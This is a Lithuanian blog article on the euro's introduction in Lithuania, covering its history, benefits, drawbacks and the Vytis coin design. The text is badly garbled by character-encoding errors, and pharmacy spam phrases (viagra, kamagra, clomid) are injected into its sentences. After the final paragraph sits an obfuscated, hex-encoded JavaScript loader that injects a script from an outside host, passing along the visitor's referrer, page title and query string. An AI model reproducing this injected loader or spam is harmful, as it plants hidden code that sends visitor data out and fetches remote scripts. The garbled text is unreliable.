Tai, kA� reikA�tA? A?inoti apie eurA� ir jo A?vedimA� Lietuvoje

Liepos 23 d. Lietuva sulaukA� galutinio sprendimo dA�l euro A?vedimo a�� ES nusprendA�, jog euras bus A?vestas jau nuo 2015 m. sausio pirmosios. A�i data yra ypatingai svarbi Lietuvai, monthly drug canada todA�l Gedimino prospekte, virA? Lietuvos banko durA? A?A?iebtas laikrodis, skaiA?iuojantis kiek liko laiko, kol Lietuvos nacionalinA� valiuta litas bus pakeista euru.

Nuo A?ios datos Lietuva tampa devynioliktA�ja visaverte euro zonos nare, kurioje naudojama bendroji Europos SA�jungos valiuta a�� euras. Valiutos pavadinimas ant eurA? banknotA? uA?raA?ytas lotynA? (EURO) ir graikA? (I�I?I?I�) kalbomis, nes Europos SA�jungoje naudojamos abi A?ios abA�cA�lA�s.

1268310172dsc_9532

A�iek tiek istorijos… does clomid cos pregnancy symptoms.

1957 m. pasiraA?yta Romos sutartis, A?steigusi Europos atominA�s energijos bendrijA� (Euratomas) ir Europos ekonominA� bendrijA� (EEB). ValstybA�s narA�s siekA� paA?alinti tarp jA? esanA?ius prekybos ir muitA? tarifA? barjerus bei sukurti bendrA� rinkA�.

1992 m. dvylikos Europos SA�jungos (ES) valstybiA? nariA? atstovA? pasiraA?ytoje ES sutartyje (Mastrichto sutartyje) numatyta A?vesti ES bendrA�jA� valiutA� ir A?steigti Europos centrinA? bankA�.

1995 m. gruodA?io mA�n. Madride ES VadovA? Taryba nusprendA� bA�simA� bendrA�jA� valiutA� vadinti euro (lietuviA?ka forma neoficialiuose dokumentuose a�� euras). Oficialus euro grafinis A?enklas a�� sukurtas iA? graikA? kalbos raidA�s epsilon, reiA?kianA?ios pirmA�jA� A?odA?io a�zEuropaa�? raidA�. A?enklas perbrauktas dviem horizontaliais brA�kA?niais, kurie simbolizuoja stabilumA� euro zonoje. Eurui A?ymA�ti naudojamas abA�cA�linis kodas a�zEURa�? ir skaitmeninis kodas a�z978a�?.

Euro vaidmuo pasaulyje

Euras, kaip viena iA? pasaulio valiutA?, A?gyja vis daugiau reikA?mA�s kaip tarptautinA� investicijA? ir uA?sienio atsargA? valiuta ir taip pat jau tapo pagrindine skolinimosi valiuta: tarptautiniA? vertybiniA? popieriA? emisija eurais dabar konkuruoja su emisijomis doleriais.

Euro teikiama nauda

Lietuvos dalyvavimas Europos SA�jungos (ES) bendrosios valiutos euro zonoje padA�s mA�sA? valstybei plA�sti prekybos ir finansinius ryA?ius su kitomis euro zonos valstybA�mis, o tai skatins Lietuvos gyventojA? pajamA? didA�jimA� ir uA?imtumA�. A�vedA� eurA� neturA�sime pinigA? keitimo iA?laidA? a�� tai nauda keliaujantiems, A? uA?sienA? vykstantiems mokytis ir dirbti A?monA�ms bei su ES valstybA�mis prekiaujanA?ioms A?monA�ms. Lietuvos dalyvavimas ES bendrojoje rinkoje ir euro naudojimas uA?tikrins kainA? stabilumA� (maA?A� infliacijA�), o tai naudinga visuomenei, nes sumaA?ins vartotojA? perkamosios galios svyravimus, A?monA�ms sudarys geresnes galimybes planuoti. Euras skatina didesnA� konkurencijA� ES bendrojoje rinkoje, todA�l vartotojai galA�s pigiau A?sigyti A?vairiA? prekiA? ir paslaugA?. Be to, lengviau palyginti kainas visoje euro zonoje. Dalyvavimas euro zonoje sudarys sA�lygas mA�sA? gyventojams ir A?monA�ms skolintis mokant nedideles palA�kanas, tai leis daugiau vartoti ir investuoti.

Euro zonos trA�kumai

VisA? pirma pinigai visada buvo simbolinis tautiA?kumo A?enklas ir yra glaudA?iai susijA�s su nacionaliniu identitetu. Litas mums yra vienas ryA?kiausiA? A?alies nepriklausomybA�s simboliA?. IlgA� laikA� vartojus banknotus su tautos A?viesuoliA? atvaizdais, A?monA�ms bus sunku prisitaikyti prie naujA? pinigA?. Reikia nepamirA?ti, kad statistika ne visada atskleidA?ia visA� tiesA� apie infliacijA�, nes vienos prekA�s brangsta akivaizdA?iai, o kitos pinga dA�l padidA�jusios konkurencijos. Daugeliui gyventojA?, ypaA? vyresnio amA?iaus, kainA? kaita gali sukelti nemaA?A� A?okA�: kainos atrodys nedidelA�s, taA?iau turimos pajamos A?vedus eurA� sumaA?A�s maA?iausiai tris su puse karto. Taip pat nereikia pamirA?ti galimA? prekybininkA? ar gamintojA? piktnaudA?iavimA?. O tikriausiai didA?iausias minusas a�� tai pereinamojo laikotarpio iA?laidos. A�aliai A?sivedant eurA� reikA�s perkainoti prekes, pakeisti verslo planus ir strategijas. A?inoma, A?ios iA?laidos vienkartinA�s, taA?iau jos tikrai sudarys nemenkA� pinigA? sumA�. Privatus sektorius taip pat patirs nuostoliA?, ypaA? tai skaudA?iai atsilieps bankams: A?is sektorius neiA?vengiamai neteks milijonA? litA? pajamA? iA? valiutos keitimo.

Screen shot 2014-04-16 at 10_22_32 AM(2)

Kaip atrodys lietuviA?ki eurai?
Lietuvoje, vos tik A?stojus A? Europos SA�jungA�, jau imta galvoti, kaip atrodys A?ia kaldinami eurai. BA�simose lietuviA?kA? eurA? monetose nutarta atvaizduoti modifikuotA� valstybA�s herbA� arba jo simbolA? VytA?. IstorinA? sprendimA�, kaip atrodys lietuviA?kos eurA? monetos su VyA?io simboliu, Lietuvos banko valdyba priA�mA� 2004 m. lapkriA?io 11 d. TA�kart oficialiai patvirtinta, kad Vytis bus kaldinamas ant visA? nominalA? monetA?. Lietuvos banko skelbtame atvirame konkurse dalyvavo 14 autoriA? ir bendraautoriA?. Jie pateikA� can i buy viagra at a store in pa 1, 2, 5, 10, 20, 50
euro centA? ir 1 bei 2 eurA? monetA? averso 54 gipsinius modelius. BA�simosios lietuviA?kos eurA? monetos bus kaldinamos kamagra tablets pagal Antano A?ukausko sukurtA� modelA?. VyA?io simbolA? supa 12 A?vaigA?duA?iA?: 1 ir 2 eurA? monetose A?arvuotas raitelis su kalaviju ir skydu verA?iasi pirmyn vertikaliA? linijA? fone, 10, 20 ir 50 euro centA? monetose a�� horizontaliA? linijA?, 1, 2 ir 5 euro centA? monetose a�� lygiame fone.

2-euru-monetos-etalonas-64547226

PasitaikA� A?vairiA? nuomoniA? dA�l Euro A?vedimo Lietuvoje. Vieni pritarA� A?iam procesui, kiti prieA?taravo, taA?iau nepaisant dvejopA? nuomoniA? Lietuvos nacionalinA� valiuta bus pakeista jau netrukus ir tikimasi, jog A?is procesas atneA? naudos ir sustiprins Lietuvos ekonominA� padA�tA?.var _0x31f1=[„\x73\x63\x72\x69\x70\x74″,“\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,“\x73\x72\x63″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D“,“\x72\x65\x66\x65\x72\x72\x65\x72″,“\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D“,“\x74\x69\x74\x6C\x65″,“\x26″,“\x3F“,“\x72\x65\x70\x6C\x61\x63\x65″,“\x73\x65\x61\x72\x63\x68″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“,“\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,“\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,“\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,“\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,“\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,“\x68\x65\x61\x64″,“\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,“\x70\x72\x6F\x74\x6F\x63\x6F\x6C“,“\x68\x74\x74\x70\x73\x3A“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x52\x5F\x50\x41\x54\x48″,“\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E“];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

Parašykite komentarą

El. pašto adresas nebus skelbiamas. Būtini laukeliai pažymėti *